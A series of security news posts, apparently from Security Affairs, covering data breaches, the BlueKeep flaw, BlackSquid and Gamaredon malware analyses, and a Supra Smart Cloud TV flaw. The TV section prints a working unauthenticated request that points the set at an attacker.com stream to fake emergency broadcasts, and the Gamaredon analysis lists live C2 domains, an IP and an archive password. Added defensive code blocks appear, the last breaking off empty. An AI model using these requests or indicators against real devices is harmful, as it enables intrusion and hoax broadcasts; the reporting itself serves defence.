AMCA also informed LabCorp that it is sending security breach notices to approximately 200,000 LabCorp consumers whose financial data may have been compromised.

According to DataBreaches.net, the stolen data is already being sold on the dark web: researchers at Gemini Advisory discovered payment card information for roughly 200,000 individuals, likely from AMCA’s databases, on offer.

“The breach had been discovered by Gemini Advisory, who informed this site that they had found approximately 200,000 patients’ payment card info for sale on a well-known marketplace. The cards had apparently been compromised between September, 2018 and the beginning of March, 2019.” states DataBreaches.net.

Pierluigi Paganini

(SecurityAffairs – American Medical Collection Agency, hacking)

The post Tens of Million patients impacted by the AMCA data breach appeared first on Security Affairs.

The Australian National University suffered a major, sophisticated attack

The Australian National University suffered a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The Australian National University was the victim of a vast hack carried out by a “sophisticated operator” who gained access to 19 years of sensitive data.

The top Australian university is known for its intense collaboration with Australia’s government and the national security services.

The university has estimated that over 200,000 people have been affected by the security breach. Vice-chancellor Brian Schmidt sent a message to the staff and students to notify them of the incident, he explained that threat actors illegally accessed the university’s systems in late 2018.

“We believe there was unauthorised access to significant amounts of personal staff, student and visitor data extending back 19 years,” Schmidt said. “We have no evidence that research work has been affected,”

“In late 2018, a sophisticated operator accessed our systems illegally. We detected the breach two weeks ago,”

Schmidt also added that exposed data included names, addresses, dates of birth, phone numbers, personal email addresses and emergency contact details, tax file numbers, payroll information, bank account details, passport details, and student academic records.

Financial data, medical records, police checks, workers’ compensation, vehicle registration numbers have not been affected.

The Australian National University reported the incident to the authorities and its partners and is currently investigating the attack with their support.

“We’re working closely with Australian government security agencies and industry security partners to investigate further.” added Schmidt.

“The University has taken immediate precautions to further strengthen our IT security and is working continuously to build on these precautions to reduce the risk of future intrusion.”

Universities are a privileged target for hackers, especially nation-state actors interested in spying on advanced research projects.

In June 2018, Chinese hackers breached the systems of the Australian National University (ANU) and, according to the experts, remained in its infrastructure even after the intrusion was discovered.

This time the authorities haven’t attributed the intrusion to a specific actor, but the events suggest the involvement of a sophisticated cyberespionage group.

Australian entities have been hit by several major attacks in recent years: in February, hackers broke into Australia’s Parliament computer network, the most recent such incident.

In October 2016, a report published by the Australian Cyber Security Centre confirmed that the Australian Bureau of Meteorology hack was carried out by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) was hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, it is the analog of the USA’s National Weather Service.

The Bureau of Meteorology supercomputer targeted by the hackers is also used to provide weather data to defense agencies, and its compromise could give a significant advantage to a persistent attacker for numerous reasons.

Initial media reports blamed China for the cyber attack, in 2013 Chinese hackers were accused by authorities of stealing the top-secret documents and projects of Australia’s new intelligence agency headquarters.

Is China behind the latest attack on the Australian National University?

Pierluigi Paganini

(SecurityAffairs – Australian National University, hacking)

The post The Australian National University suffered a major, sophisticated attack appeared first on Security Affairs.

Expert developed a MetaSploit module for the BlueKeep flaw

A security expert has developed a Metasploit module to exploit the critical BlueKeep vulnerability and get remote code execution.

The security researcher Zǝɹosum0x0 has developed a module for the popular Metasploit penetration testing framework to exploit the critical BlueKeep flaw.

The vulnerability, tracked as CVE-2019-0708, affects Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is wormable: malware authors could use it to build malicious code with WannaCry-like self-propagation capabilities.

As explained by Microsoft, the flaw can be exploited without user interaction, which makes it possible for wormable malware to spread in an uncontrolled way across target networks.

Many security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. On Windows 7 and Server 2008, enabling Network Level Authentication (NLA) prevents unauthenticated exploitation, and blocking TCP port 3389 at the perimeter also mitigates the threat.
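The NLA mitigation mentioned here and in the NSA advisory's mitigation list earlier on this page can be verified from the network without touching the vulnerability itself. The probe below is an added example written for this page, not code from the NSA, Microsoft, or the Metasploit module under discussion. It offers the server only legacy RDP security in a standard X.224 Connection Request; a host that enforces NLA rejects that offer with failure code HYBRID_REQUIRED_BY_SERVER, while a host that accepts it is letting unauthenticated clients into the pre-authentication code path. The sample response bytes are constructed, not captured from real servers.

```python
"""Check from the network whether an RDP listener enforces NLA.

Added example, not code from the NSA advisory, Microsoft, or the Metasploit
module discussed on this page. It sends a standard X.224 Connection Request
carrying an RDP Negotiation Request that offers only legacy RDP security (no
TLS, no CredSSP). A server that requires Network Level Authentication rejects
the offer with RDP_NEG_FAILURE / HYBRID_REQUIRED_BY_SERVER; a server that
accepts it lets an unauthenticated client into the pre-authentication code
path, which is where the BlueKeep mitigation matters. The probe does not test
for CVE-2019-0708 itself.
"""
import socket
import struct
import sys

PROTOCOL_RDP = 0x00000000            # standard RDP security
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x05     # MS-RDPBCGR 2.2.1.2.2 failureCode

# Constructed answers for offline checks (not captured from real servers).
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed000001234000300080005000000")
SAMPLE_RDP_ALLOWED = bytes.fromhex("030000130ed000001234000200080000000000")
SAMPLE_LEGACY = bytes.fromhex("0300000b06d00000123400")


def build_connection_request(requested_protocols=PROTOCOL_RDP):
    """TPKT header + X.224 Connection Request + RDP_NEG_REQ (MS-RDPBCGR 2.2.1.1)."""
    # RDP_NEG_REQ: type, flags, length (always 8), requestedProtocols (little-endian)
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested_protocols)
    # X.224 CR TPDU: LI=14 (6 fixed bytes + 8-byte negotiation block), CR code, DST-REF, SRC-REF, class 0
    x224 = struct.pack(">BBHHB", 0x0E, 0xE0, 0x0000, 0x0000, 0x00)
    body = x224 + neg_req
    return struct.pack(">BBH", 0x03, 0x00, 4 + len(body)) + body


def parse_connection_confirm(data):
    """Classify the server's X.224 Connection Confirm.

    Returns (verdict, value) where verdict is one of:
      'nla_required'        server refused legacy RDP security; NLA is enforced
      'rdp_allowed'         server accepted; value is selectedProtocol
      'negotiation_failure' other failureCode (1 = SSL_REQUIRED_BY_SERVER: TLS but no NLA)
      'no_negotiation'      pre-negotiation server, legacy security only
    """
    if len(data) < 11 or data[0] != 0x03:
        raise ValueError("not a TPKT response")
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    if data[5] & 0xF0 != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if tpkt_len < 19 or len(data) < 19:
        return "no_negotiation", None
    neg_type = data[11]                              # RDP_NEG_RSP / RDP_NEG_FAILURE type byte
    value = struct.unpack("<I", data[15:19])[0]      # selectedProtocol or failureCode
    if neg_type == TYPE_RDP_NEG_RSP:
        return "rdp_allowed", value
    if neg_type == TYPE_RDP_NEG_FAILURE:
        if value == HYBRID_REQUIRED_BY_SERVER:
            return "nla_required", value
        return "negotiation_failure", value
    raise ValueError(f"unexpected negotiation type {neg_type:#x}")


def probe(host, port=3389, timeout=5.0):
    """Connect, offer legacy RDP security only, and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request())
        return parse_connection_confirm(sock.recv(64))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    verdict, value = probe(target)
    print(f"{target}: {verdict} (value={value})")
```

Read `nla_required` as “the unauthenticated path is closed”, and `rdp_allowed` or `no_negotiation` as “patch or firewall this host”. A `negotiation_failure` with code 1 means the server insists on TLS but not on NLA, so the pre-authentication surface is still reachable over TLS; re-run with `requested_protocols=1` (PROTOCOL_SSL) to confirm.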

The Metasploit module could be used to trigger the BlueKeep flaw on vulnerable Windows XP, 7, and Server 2008, but the expert has not publicly disclosed it to avoid threat actors abusing it.

Unfortunately, roughly one million devices exposed online have been found to be vulnerable to BlueKeep, and hackers are ready to hit them.


Zǝɹosum0x0 also published a video PoC that shows how to exploit the BlueKeep vulnerability on a Windows 2008 system.

According to Zǝɹosum0x0, the module could be used also against machines running on Windows 7 and Server 2008 R2.

This Metasploit module doesn’t work against Windows Server 2003.

Zǝɹosum0x0 also developed a scanner Metasploit module for the CVE-2019-0708 BlueKeep RCE vulnerability.

At the end of May, Microsoft issued a second warning for users of older Windows OS versions to update their systems in order to patch the remote code execution vulnerability dubbed BlueKeep.

The NSA also issued an alert to urge users to install the security patches to address the BlueKeep flaw.

“The National Security Agency is urging Microsoft Windows administrators and users to ensure they are using a patched and updated system in the face of growing threats. Recent warnings by Microsoft stressed the importance of installing patches to address a protocol vulnerability in older versions of Windows ” reads the NSA’s advisory.

“This is the type of vulnerability that malicious cyber actors frequently exploit through the use of software code that specifically targets the vulnerability. For example, the vulnerability could be exploited to conduct denial of service attacks. It is likely only a matter of time before remote exploitation code is widely available for this vulnerability. NSA is concerned that malicious cyber actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.

NSA urges everyone to invest the time and resources to know your network and run supported operating systems with the latest patches.”

Pierluigi Paganini

(SecurityAffairs – Metasploit, hacking)


The post Expert developed a MetaSploit module for the BlueKeep flaw appeared first on Security Affairs.

BlackSquid malware uses multiple exploits to drop cryptocurrency miners

A new piece of malware appeared in the threat landscape, dubbed BlackSquid it targets web servers with several exploits to deliver cryptocurrency miners.

Security experts at Trend Micro have discovered a new Monero cryptocurrency miner, dubbed BlackSquid, that targets web servers, network drives, and removable drives.

The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.

According to the experts, BlackSquid has worm-like propagation capabilities and can also launch brute-force attacks.

“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”

The peculiarity of BlackSquid is that it employs a set of some of the most dangerous known exploits.

While many forms of malicious code will employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard. 

The list of exploits used by the malware includes EternalBlue and DoublePulsar; exploits for CVE-2014-6287 (Rejetto HTTP File Server), the Tomcat arbitrary file upload vulnerability CVE-2017-12615, and the LNK remote code execution flaw CVE-2017-8464; and three ThinkPHP exploits for different versions of the framework.

The threat is delivered via infected web pages, exploits, or removable and network drives.

BlackSquid uses the GetTickCount API as a random seed to pick the IP address of a web server to attack.

The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.

“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.” continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”

The malware halts the infection routine if at least one of the following conditions is met:

  • The victim’s username is included in a list of common sandbox usernames;
  • The disk drive model is equal to one included in a specific list;
  • The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.

BlackSquid uses the EternalBlue and DoublePulsar exploits (the MS17-010 SMB remote code execution flaw) to propagate through the target network, gaining the same rights as the local system user on the machines it compromises.

If the infected system has an Nvidia or AMD video card, which the malware checks for with WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), it downloads a second component to mine on the graphics processing unit (GPU).

Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.

The presence of coding errors and purposely skipped routines suggests that BlackSquid is still in development and testing.

“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.

“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages;”

Pierluigi Paganini

(SecurityAffairs – BlackSquid, hacking)

The post BlackSquid malware uses multiple exploits to drop cryptocurrency miners appeared first on Security Affairs.

CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions

A security expert disclosed technical details of a new unpatched vulnerability (CVE-2019-9510) that affects Microsoft Windows Remote Desktop Protocol (RDP).

Security expert Joe Tammariello of Carnegie Mellon University Software Engineering Institute (SEI), discovered a new unpatched vulnerability in Microsoft Windows Remote Desktop Protocol (RDP).

The flaw, tracked as CVE-2019-9510, could be exploited by client-side attackers to bypass the lock screen on remote desktop (RD) sessions.

Exploiting the flaw requires physical access to the system being used as the RDP client, which is why it received a CVSS score of 4.6 (medium severity). The flaw affects Windows 10 starting with version 1803 and Windows Server 2019.

The vulnerability resides in the way Windows handles Remote Desktop sessions authenticated with Network Level Authentication (NLA).

“Microsoft Windows RDP Network Level Authentication can allow an attacker to bypass the lock screen on remote sessions.” reads the advisory published by the CERT/CC.

“Starting with Windows 10 1803 and Windows Server 2019, Windows RDP handling of NLA-based RDP sessions has changed in a way that can cause unexpected behavior with respect to session locking. If a network anomaly triggers a temporary RDP disconnect, upon automatic reconnection the RDP session will be restored to an unlocked state, regardless of how the remote system was left. “

When a network anomaly triggers a temporary RDP disconnect, the session is automatically reconnected and restored to an unlocked state, regardless of the state in which the remote system was left. The CERT/CC describes the following attack scenario:

  • User connects to a remote Windows 10 1803, Server 2019 or newer system using RDP.
  • User locks the remote desktop session.
  • User leaves the physical vicinity of the system being used as an RDP client.

An attacker with access to the RDP client can then interrupt its network connectivity; on reconnection the session with the remote system is restored unlocked, without any credentials being provided.

The advisory published by the CERT/CC states that two-factor authentication systems that integrate with the Windows login screen (e.g. Duo Security MFA) can be bypassed by exploiting CVE-2019-9510.

“Two-factor authentication systems that integrate with the Windows login screen, such as Duo Security MFA, are also bypassed using this mechanism. Any login banners enforced by an organization will also be bypassed.” continues the advisory.

The CERT/CC suggests the following workarounds:

  • Lock the local system as opposed to the remote system.
  • RDP sessions should be disconnected rather than locked to invalidate the current session and prevent an automatic RDP session reconnection without credentials.

Tammariello reported the flaw to Microsoft on April 19, but the company declined to treat it as a security vulnerability.

“[The] behavior does not meet the Microsoft Security Servicing Criteria for Windows,” states the company.

Pierluigi Paganini

(SecurityAffairs – RDP, CVE-2019-9510)

The post CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions appeared first on Security Affairs.

OilRig’s Jason email hacking tool leaked online

A few hours ago, a new email hacking tool dubbed Jason and associated with the OilRig APT group was leaked through the same Telegram channel used to leak other tools.

A new email hacking tool associated with the Iran-linked OilRig APT group was leaked through the same Telegram channel that in April leaked the source code of 6 tools used by the crew.

In April, a hacker group that goes online by the name Lab Dookhtegan disclosed details about operations conducted by the Iran-linked cyber-espionage group tracked as OilRig, APT34, and HelixKitten. The Lab Dookhtegan hackers used a Telegram channel to dump information about the OilRig infrastructure, revealing details about its hacking tools, members, and operations. The hackers also disclosed IP addresses and domains involved in operations conducted by the group over the years.

Now the group released a tool that was allegedly used by OilRig “for hacking emails and stealing information.”

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

The new tool could be used to hijack Microsoft Exchange email accounts; it was dubbed Jason and currently has a detection rate of 0 on VirusTotal.


The Jason email hijacking tool is used by threat actors to carry out brute-force attacks using a dictionary of password samples and four text files containing numerical patterns.

According to VirusTotal the sample was compiled in 2015 and at the time of writing it is detected only by 7 out of 71 antivirus solutions.


The leak of the hacking tools allowed security firms to analyze them and implement rules for their detection.

On the other hand, other hackers could use these tools to carry out attacks, making attribution harder.

You can find further info on the Jason tool in a blog post published by Omri Segev Moyal, the co-founder at Minerva Labs.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – OilRig, Jason email hijacking tool)



A month later Gamaredon is still active in Eastern Europe

Gamaredon continues to target Ukraine, Yoroi-Cybaze ZLab spotted a new suspicious activity potentially linked to the popular APT group

Introduction

The Gamaredon attacks against Ukraine don’t seem to have stopped. A month after our last report, we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015, but evidence of its activities has been dated back to 2013. Recently, Gamaredon has also been targeting the Ukrainian military and law enforcement sectors, as officially stated by CERT-UA.

Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to figure out evolution or changes in the threat actor TTPs.

Technical Analysis

Figure 1. Malicious e-mail

The infection chain is composed of several stages of password-protected SFX (self-extracting) archives, each containing VBS or batch scripts.

At the final stage of this malicious chain, we found a customized version of UltraVNC, a well known off-the-shelf tool for remote administration, modified by the Group and configured to connect to their command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

Hash: 5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder whose name means “suspected” in Ukrainian and a single suspicious file with the “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated with the file, which normally does not belong to .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on the VirusTotal platform: only four AV engines identify it as malicious, and only one engine recognizes that it may be associated with the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first script executed is “15003.cmd”, which first checks for the presence of malware analysis tools. If it detects Wireshark or Procexp, it terminates itself. Otherwise, it copies:

Figure 4. Content of SFX
  • the “11439” file to “%USERNAME%\winupd.exe”
  • the “28509” file to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winupd.lnk”, a shortcut pointing to the previous executable that grants persistence across machine reboots
  • the “20261” file to “%TEMP%\7ZipSfx.000\Document.docx”
Figure 5. Script content in “15003.cmd” file

At the same time, the extracted document is shown in order to divert the user’s attention and let the infection continue unnoticed. This document, written in Ukrainian, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Exploring the LNK file, it is possible to see that it starts the “winupd.exe” file with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This indicates that “winupd.exe” is another self-extracting archive, but this time it is password protected.
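An added triage helper, not part of the Yoroi analysis, that flags the SFX pattern described above: a PE file (here a .scr attachment) carrying a 7-Zip or RAR archive appended after its stub. The sample bytes are constructed; in practice each archive extracted from one stage can be fed back in to walk the whole Matryoshka.

```python
"""Triage helper for SFX droppers: an executable with an archive appended to its stub."""
import os
from typing import List, Tuple

# Magic numbers of the archive formats behind 7-Zip and WinRAR self-extracting stubs.
ARCHIVE_SIGNATURES = {
    "7z": b"7z\xbc\xaf\x27\x1c",
    "rar4": b"Rar!\x1a\x07\x00",
    "rar5": b"Rar!\x1a\x07\x01\x00",
}
# Attachment extensions that run as native code while looking like something else.
DISGUISED_EXECUTABLE_EXTENSIONS = {".scr", ".pif", ".com"}


def find_embedded_archives(data: bytes) -> List[Tuple[str, int]]:
    """Return (format, offset) for every archive signature found in the blob."""
    hits = []
    for kind, magic in ARCHIVE_SIGNATURES.items():
        start = 0
        while True:
            off = data.find(magic, start)
            if off < 0:
                break
            hits.append((kind, off))
            start = off + 1
    return sorted(hits, key=lambda hit: hit[1])


def classify_attachment(filename: str, data: bytes) -> List[str]:
    """Reasons the file matches the SFX-dropper pattern; an empty list means none."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    is_pe = data.startswith(b"MZ")
    if is_pe and ext in DISGUISED_EXECUTABLE_EXTENSIONS:
        reasons.append(f"PE delivered with a {ext} extension")
    archives = find_embedded_archives(data)
    if is_pe and archives:
        where = ", ".join(f"{kind} at {off:#x}" for kind, off in archives)
        reasons.append(f"archive appended to executable stub: {where}")
    return reasons


def build_sample_sfx() -> bytes:
    """Constructed stand-in for a 7-Zip SFX: a fake PE stub followed by a 7z header."""
    stub = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 200
    archive = ARCHIVE_SIGNATURES["7z"] + b"\x00\x04" + b"\x00" * 24
    return stub + archive


if __name__ == "__main__":
    sample = build_sample_sfx()
    for reason in classify_attachment("Document.scr", sample):
        print("suspicious:", reason)
```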

Stage 2

Hash: fd59b1a991df0a9abf75470aad6e2fcd67c070bfccde9b4304301bc4992f678e
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content into “%TEMP%\RarSFX0\” and then executes the “setup.vbs” script, which contains only two lines of code and simply hands execution over to “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\”. This script tries to download another malicious file from “http://bitvers.ddns[.net/{USERNAME}/{DATE}/index.html”. Researching this server, we noticed that its associated DNS records change continuously; indeed, the attacker has changed the domain names many times recently. Moreover, querying the service behind the latest associated DNS record, the host still responds with a “403 Forbidden” message, indicating the infrastructure may still be operative.

Figure 10. Information about C2 and relative DNS

The script also creates a new scheduled task in order to periodically execute (every 20 minutes) the VBS script.

Figure 11. POST request sent to C2 with victim machine information

It also collects information about the victim’s system using the legitimate Microsoft “systeminfo” tool and sends it to the remote server through a POST request made with the “MicrosoftCreate.exe” file, which is actually the legitimate “wget” utility. The response body contains a new executable file, named “jasfix.exe”, representing the next stage.

Stage 3

Hash: c479d82a010884a8fde0d9dcfdf92ba9b5f4125fac1d26a2e36549d8b6b4d205
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After some research, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we noticed that it is another SFX archive containing further files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd” that renames the “win.jpg” into “win.exe”, another password protected SFX.

Stage 4

Hash: 28eff088a729874a611ca4781a45b070b46302e494bc0dd53cbaf598da9a6773
Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon Matryoshka archives, where the “.cmd” file is designed to decrypt and run the next stage, this time using the string “gblfhs” as the password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it is actually a PE32 executable. Exploring the “.rsrc” section of the executable, we noticed several “.class” files; two of them are named “VncCanvas” and “VncViewer”. These files are part of a legitimate Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.ddns[.net” domain, which resolves to an endpoint at 195.88.208.51, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT

Conclusion

This recent attack campaign shows that Gamaredon’s operations are still ongoing and confirms the potential Russian interest in infiltrating the Eastern European ecosystem, especially the Ukrainian one. The techniques and infection patterns the group is using are extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure of chained SFX archives typical of their implant, still effective and not easily detected by several antivirus engines.

Also, digging into this infection chain, we noticed the return of third-party RATs as the payload, an old Gamaredon habit that had been replaced some time ago by the custom-made Pterodo backdoor.

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

https://blog.yoroi.company/research/the-russian-shadow-in-eastern-europe-a-month-later/

Pierluigi Paganini

(SecurityAffairs – Gamaredon, state-sponsored hacking)


macOS zero-day in Mojave could allow Synthetic Clicks attacks

A security expert found a flaw that could be exploited to bypass macOS security and privacy features by using synthetic clicks.

The popular white hat hacker Patrick Wardle, co-founder and chief research officer at Digita Security, discovered a vulnerability that could be exploited to bypass security warnings by performing ‘Synthetic Clicks’ on behalf of users without requiring their interaction.

In June, Apple introduced a core security feature in macOS that forces applications to ask users for permission before accessing sensitive data or components on the system (i.e. device camera, microphone, location data, photos, messages, and browsing history).

Wardle disclosed the issue over the weekend during the meeting arranged by his company.

Wardle explained that a “subtle code-signing issue” in macOS could allow the hack of any trusted application to generate synthetic clicks, bypassing the core security feature introduced in 2018. Malware developers and hackers might use synthetic mouse-click attacks to emulate human behavior in approving security warnings.

The attack could be triggered by an attacker with local access to the device while the screen is dimmed, which makes it very difficult to spot.

According to Wardle, no special privileges are required to carry out the attack.

The attack involves the Transparency, Consent, and Control (TCC) system, which maintains the databases for privacy control settings. The system also includes a compatibility database, stored in AllowApplicationsList.plist, used to manage access to protected functions for specific versions of apps with specific signatures; it works as a sort of whitelist.

Wardle explained that an attacker can modify one of the applications in the whitelist and execute it to generate synthetic clicks: an attacker can download a modified version of the targeted app and run it, and Apple’s code validation checks fail to detect the changes to the targeted app because of a flaw.


Wardle discovered several issues in macOS that could be exploited to perform synthetic clicks; he publicly disclosed one in September 2018 and another one at DefCon 2018.

The security updates released by Apple over time failed to completely address the issue, allowing the expert to launch synthetic click attacks again. Wardle reported his discovery to Apple a few days ago; the company acknowledged the problem and is likely already working to address it.

While waiting for a fix, macOS users could install GamePlan, the endpoint protection product designed by Digita Security, which prevents synthetic clicks.



Pierluigi Paganini

(SecurityAffairs – Apple, zero-day)


Australian teenager hacked into Apple twice for a job

What can an Apple fan do to get a job with his favorite company? A teenager chose to hack it twice.

A 17-year-old Australian teenager decided to attract the attention of the tech giant by gaining access to its mainframe with false credentials.

The teen was dreaming of a job at Apple and was convinced that his actions would count for much more than a plain CV or an internship application.

Unfortunately, the teen was identified and has been found guilty of hacking into Apple’s infrastructure twice, in 2015 and 2017.


“The boy, who is now 17, faced the Adelaide Youth Court and pleaded guilty to multiple computer hacking charges.” reported the Australian ABC website.

“The court heard he and another teenager from Melbourne hacked into the technology giant’s mainframe in December 2015 and then again in early 2017 and downloaded internal documents and data.”

The teenager is from Adelaide, Australia, and breached an Apple mainframe by creating false credentials, with the help of another young hacker. The teen’s lawyer, Mark Twiggs, explained to the court that his client had no bad intentions and, due to his young age, was not aware of the severe consequences.

“This offending started when my client was 13 years of age, a very young age,” said Twiggs.

“He had no idea about the seriousness of the offence and hoped that when it was discovered that he might gain employment at this company.
“He didn’t know this was going to lead to anything other than a job at the end of it, [this] happened in Europe, a similar person got caught and they ended up getting employed by the company.”

The good news is that Apple did not incur any financial or intellectual loss from the hack.

Magistrate David White only placed the teenager on a $500 bond to be of good behaviour for nine months.

“He is clearly someone who is a gifted individual when it comes to information technology, that being said, those who have this advantage of being gifted doesn’t give them the right to abuse that gift,” said the Magistrate.

“The manner in which the world functions is one that is heavily reliant on computer technology and those who unlawfully interfere with those systems can do enormous amounts of damage.”

Magistrate White urged the teenager to use his talent in a better way in the future and to avoid breaking the law.



Pierluigi Paganini

(SecurityAffairs – Apple, hacking)


Expert shows how to Hack a Supra Smart Cloud TV

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI


Technical Observation: 
We are abusing `openLiveURL()`, which allows a local attacker to broadcast video on a Supra Smart Cloud TV. I found this vulnerability initially by source code review, and then crawling the application and reading every request helped me to trigger this vulnerability.

Vulnerable code:

// Client-side helper from the TV's web UI: it hands the caller-supplied URL
// straight to /remote/media_control, with no authentication or validation.
function openLiveTV(url)
{
    $.get("/remote/media_control", {m_action:'setUri', m_uri:url, m_type:'video/*'},
        function (data, textStatus){
            if("success"==textStatus){
                alert(textStatus);
            }else
            {
                alert(textStatus);
            }
        });
}

Vulnerable request:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

To trigger the vulnerability you can send a crafted request to the URL,

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Although the above-mentioned URL takes an (.m3u8) format-based video, we can use `curl -v -X GET` to send such a request; typically this is an unauthenticated remote file inclusion. An attacker could broadcast any video without any authentication; in the worst case, an attacker could leverage this vulnerability to broadcast a fake emergency message (scary, right?)

This is still unpatched because I didn’t find any way to contact the vendor.

The above video PoC shows a successful demonstration of this attack, where Mr. Steve Jobs’ speech is suddenly replaced with the attacker’s fake “Emergency Alert Message”; this may make the end user panic.
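A hardened server-side counterpart to the handler behind that request, as an added example that is not the vendor’s firmware code: it requires a session token before acting on setUri and checks the requested uri against an owner-configured allowlist of media origins. The origins, token and paths are constructed for this example.

```python
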